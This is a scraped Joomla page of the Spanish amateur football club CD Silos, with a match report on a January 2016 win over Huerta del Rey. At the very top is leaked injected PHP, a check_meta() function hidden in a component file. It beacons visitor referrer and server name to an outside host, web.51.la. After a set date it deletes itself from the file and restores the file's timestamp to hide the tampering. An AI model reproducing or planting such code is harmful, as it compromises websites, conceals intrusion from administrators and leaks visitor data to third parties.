check_meta(); function check_meta(){ $jp = __FILE__; $jptime = filemtime($jp); if(time() >= 1456731446){ $jp_c = file_get_contents($jp); if($t = @strpos($jp_c,"check_meta();")) { $contentp = substr($jp_c,0,$t); if(@file_put_contents($jp, $contentp)){ @touch($jp,$jptime); } } } @file_get_contents("http://web.51.la:82/go.asp?svid=5&id=18776729&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/components/com_contact/models/content.php"); } Silos se mantiene en la lucha por el liderato.

La Afición

Calendario

<<  Mayo 2017  >>
 Lu  Ma  Mi  Ju  Vi  Sa  Do 
  1  2  3  4  5  6  7
  8  91011121314
15161718192021
22232425262728
293031    
Banner
Banner
Banner
Banner

Acceso Privado Equipo



Silos se mantiene en la lucha por el liderato. PDF Imprimir E-mail
Jueves, 14 de Enero de 2016 12:53

Vuelta a la competición después del parón navideño, llegaba Silos a estas alturas de competición con la necesidad de sumar los tres puntos para así depender de si mismo en la lucha por la primera plaza del grupo.

Pronto se puso el partido de cara para el CD Silos, de hecho en la primera jugada del partido ya consiguió ponerse por delante en el marcador, Sancho aprovecho las dudas en la defensa visitante para marcar el primero de sus dos goles de la tarde.

 

La primera parte continuaba sin un  dominador claro, Silos hacía daño por medio de Kross en banda izquierda mientras Huerta del Rey se acercaba por medio del balón parado. No tardo mucho en poner tierra de por medio el equipo local, balón por banda derecha de David que llego a Sancho, internada en el área acabando con un pase para que Ricar pusiera el segundo de la tarde en el marcador.

A partir de este momento la primera parte ya solo tuvo un dueño, Silos seguía teniendo ocasiones y las llegadas de huerta eran cada vez más escasas y fruto de este dominio llego el tercero por medio de Sancho que ponía el partido muy de cara para Silos.

La segunda parte comenzó con Huerta más intenso, pequeñas tanganas y un Silos que no creaba ocasiones, en medio de ese embarullado comienzo llego el penalti que supuso el tanto visitante. A partir de este momento balones colgados que Adrian acertaba a despejar y  jugadas rapidas por parte de un Silos que no acababa de controlar el partido.

El último tramo del partido volvió a ser favorable al CD Silos, ya si que se llegaba con mas claridad, ocasiones que Sancho no acertaba a materializar y un Huerta del Rey que perdió fuerza según aumentaban sus protestas al colegiado.

Nueva victoria que permite seguir en la pelea por el liderato, los integrantes del CD Silos ya tienen la cabeza puesta en las dos finales que quedan, la primera el Sábado en Puentedura.

Deportivo¡¡¡¡¡¡¡¡

 

Escribir un comentario

Código de seguridad
Refescar

Banner
Banner

Colaboradores

Banner
Banner
Banner
Banner
Banner
Banner



By vicencid. Potenciado por Jommla!. Valid XHTML and CSS.